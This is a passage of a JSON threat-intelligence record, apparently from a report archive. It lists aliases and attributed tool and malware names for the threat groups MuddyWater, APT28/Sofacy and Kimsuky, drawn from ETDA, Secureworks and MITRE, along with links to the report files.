"ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434060, "ts_updated_at": 1775792269, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.pdf", "text": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.txt", "img": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.jpg" } }